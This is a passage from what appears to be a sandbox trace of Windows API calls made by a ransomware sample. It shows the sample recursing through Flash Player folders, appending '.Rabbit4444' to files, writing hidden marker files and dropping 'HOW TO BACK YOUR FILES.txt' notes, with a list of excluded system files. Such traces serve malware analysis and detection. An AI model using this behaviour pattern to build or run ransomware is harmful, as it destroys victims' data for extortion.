0x108ce0 [0053.773] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0053.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0053.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0053.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14508439664) returned 1 [0053.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0053.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0053.774] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.774] CloseHandle (hObject=0x298) returned 1 [0053.774] CloseHandle (hObject=0x278) returned 1 [0053.774] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.Rabbit4444") returned 140 [0053.774] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\settings.sol.rabbit4444"), dwFlags=0x1) returned 1 [0053.775] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe69631a4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c26071, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c33729, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0xc5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0053.775] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0053.775] lstrcpyW (in: lpString1=0x130ec22, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.775] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.777] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.777] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.777] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.777] CloseHandle (hObject=0x278) returned 1 [0053.777] CloseHandle (hObject=0x27c) returned 1 [0053.777] GetCurrentThreadId () returned 0xd98 [0053.777] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0053.777] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0053.778] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11eb00 | out: hHeap=0xe0000) returned 1 [0053.778] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0053.778] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0053.778] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0053.778] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3" [0053.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.779] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.781] FlushFileBuffers (hFile=0x27c) returned 1 [0053.782] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.782] CloseHandle (hObject=0x27c) returned 1 [0053.783] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned 70 [0053.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.783] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95fca16, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0053.783] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.783] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.783] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.783] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.783] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe95fca16, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.783] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.783] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.783] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.783] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.783] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.783] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe95fca16, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe95fca16, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.783] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.784] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.784] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c61d87, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCVUDUNH", cAlternateFileName="")) returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="Rabbit4444.exe") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2=".") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="..") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="windows") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="bootmgr") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="pagefile.sys") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="boot") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="ids.txt") returned 1 [0053.784] lstrcmpiW (lpString1="XCVUDUNH", lpString2="NTUSER.DAT") returned 1 [0053.784] lstrcpyW (in: lpString1=0x130ebc6, lpString2="XCVUDUNH" | out: lpString1="XCVUDUNH") returned="XCVUDUNH" [0053.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0053.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0xf11e8 [0053.784] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6670 [0053.784] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c61d87, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCVUDUNH", cAlternateFileName="")) returned 0 [0053.784] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0053.784] lstrcpyW (in: lpString1=0x130ebc6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.786] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.786] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.786] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.786] CloseHandle (hObject=0x278) returned 1 [0053.786] CloseHandle (hObject=0x27c) returned 1 [0053.786] GetCurrentThreadId () returned 0xd98 [0053.786] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0053.786] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" [0053.786] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0053.786] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0053.786] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH" [0053.786] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\" [0053.786] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3" [0053.786] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.787] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.790] FlushFileBuffers (hFile=0x27c) returned 1 [0053.791] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.791] CloseHandle (hObject=0x27c) returned 1 [0053.792] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH") returned 79 [0053.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.792] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0053.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.792] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.792] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.792] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.792] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53db3d7, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c61d87, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.792] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.792] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.792] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.792] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.792] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.792] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6cd5b, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#AppContainer", cAlternateFileName="#APPCO~1")) returned 1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="Rabbit4444.exe") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2=".") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="..") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="windows") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="bootmgr") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="pagefile.sys") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="boot") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="ids.txt") returned -1 [0053.792] lstrcmpiW (lpString1="#AppContainer", lpString2="NTUSER.DAT") returned -1 [0053.792] lstrcpyW (in: lpString1=0x130ebd8, lpString2="#AppContainer" | out: lpString1="#AppContainer") returned="#AppContainer" [0053.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0053.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x10a2f0 [0053.793] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0053.793] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9622ca9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9622ca9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.793] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.793] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.793] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9622ca9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9622ca9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9622ca9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.793] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0053.793] lstrcpyW (in: lpString1=0x130ebd8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.793] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.795] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.795] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.795] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.795] CloseHandle (hObject=0x278) returned 1 [0053.795] CloseHandle (hObject=0x27c) returned 1 [0053.795] GetCurrentThreadId () returned 0xd98 [0053.795] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0053.795] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" [0053.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0053.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0053.795] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" [0053.795] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\" [0053.796] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3" [0053.796] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.796] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.799] FlushFileBuffers (hFile=0x27c) returned 1 [0053.800] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.800] CloseHandle (hObject=0x27c) returned 